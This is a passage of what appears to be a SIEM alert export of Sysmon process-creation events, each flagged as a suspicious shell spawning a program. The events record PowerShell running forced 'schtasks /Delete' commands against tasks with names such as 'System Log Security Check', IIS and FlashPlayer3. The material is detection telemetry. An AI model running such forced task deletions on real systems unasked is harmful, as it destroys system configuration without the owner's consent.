/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.941347100Z"",""eventRecordID"":""3312"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.939\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-00103dd62b00}\r\nProcessId: 4340\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.939"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-00103dd62b00}"",""processId"":""4340"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.421",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.913 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-00108ad42b00} +ProcessId: 5724 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.919669000Z"",""eventRecordID"":""3311"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.913\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-00108ad42b00}\r\nProcessId: 5724\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:33.913"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-00108ad42b00}"",""processId"":""5724"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.395",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.892 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010c4d22b00} +ProcessId: 8188 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""System Log Security Check"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 
+IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""System Log Security Check\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.894672200Z"",""eventRecordID"":""3310"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.892\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010c4d22b00}\r\nProcessId: 8188\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""System Log Security Check\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: 
{df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.892"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-0010c4d22b00}"",""processId"":""8188"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""System Log Security Check\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.352",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.866 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001013d12b00} +ProcessId: 5624 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating 
System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsLogTasks /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsLogTasks /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.869801400Z"",""eventRecordID"":""3309"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.866\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001013d12b00}\r\nProcessId: 5624\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsLogTasks /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: 
{df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.866"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-001013d12b00}"",""processId"":""5624"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsLogTasks /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.289",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 
2020-05-28 12:51:33.810 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010e1ce2b00} +ProcessId: 8100 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN IIS /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN IIS /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.815838300Z"",""eventRecordID"":""3308"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.810\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010e1ce2b00}\r\nProcessId: 8100\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft 
Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN IIS /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.810"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-0010e1ce2b00}"",""processId"":""8100"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN IIS /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.255",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.761 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010f8cc2b00} +ProcessId: 4312 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer3 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.775117500Z"",""eventRecordID"":""3307"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.761\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010f8cc2b00}\r\nProcessId: 4312\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.761"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-0010f8cc2b00}"",""processId"":""4312"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.171",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.704 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001007ca2b00} +ProcessId: 5196 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
